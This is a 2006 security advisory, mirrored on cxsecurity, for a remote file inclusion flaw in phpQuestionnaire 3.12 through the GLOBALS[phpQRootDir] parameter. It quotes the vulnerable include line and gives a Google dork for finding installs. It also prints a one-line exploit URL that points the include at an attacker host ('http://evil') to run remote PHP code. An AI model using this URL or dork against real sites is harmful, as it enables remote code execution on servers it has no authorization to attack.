SolpotCrew Advisory #12 - phpQuestionnaire 3.12 (GLOBALS[phpQRootDir]) Remote File Inclusion

2006-09-28 / 2006-09-29
Credit: Solpot
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#############################SolpotCrew Community################################ # # phpQuestionnaire 3.12 (GLOBALS[phpQRootDir]) Remote File Inclusion # # vendor : http://http://www.chumpsoft.com/products/phpq/ # ######################################################################## ######### # # # Bug Found By :Solpot a.k.a (k. Hasibuan) (21-09-2006) # # contact: chris_hasibuan (at) yahoo (dot) com [email concealed] # # Website : http://www.nyubicrew.org/adv/solpot-adv-08.txt # ######################################################################## ######## # # # Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid # robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa # home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo # Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX # x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ # and all member solpotcrew community # especially thx to str0ke @ milw0rm.com # ######################################################################## ####### Input passed to the "GLOBALS[phpQRootDir]" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources. code from inc/ifunctions.php ######################################################################## ######## # phpQuestionnaire Version 3.12 # # Copyright 2003-2006 chumpsoft, inc. August 7, 2006 # # http://www.chumpsoft.com/products/phpq/ support (at) chumpsoft (dot) com [email concealed] # ######################################################################## ######## # Use of this program constitutes your agreement to the terms contained in the # # LICENSE file within this distribution. # ######################################################################## ######## include($GLOBALS["phpQRootDir"] . "inc/tableformat.php"); function ImportSurvey ($fp, $type, $flag) { set_time_limit(600); # Attempt to disable time limit in case upgrade takes long google dork : "phpQuestionnaire v3" exploit : http://somehost/path_to_phpQuestionnaire/inc/ifunctions.php?GLOBALS[phpQ RootDir]=http://evil ##############################MY LOVE JUST FOR U RIE######################### ######################################E.O.F############################# #####


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top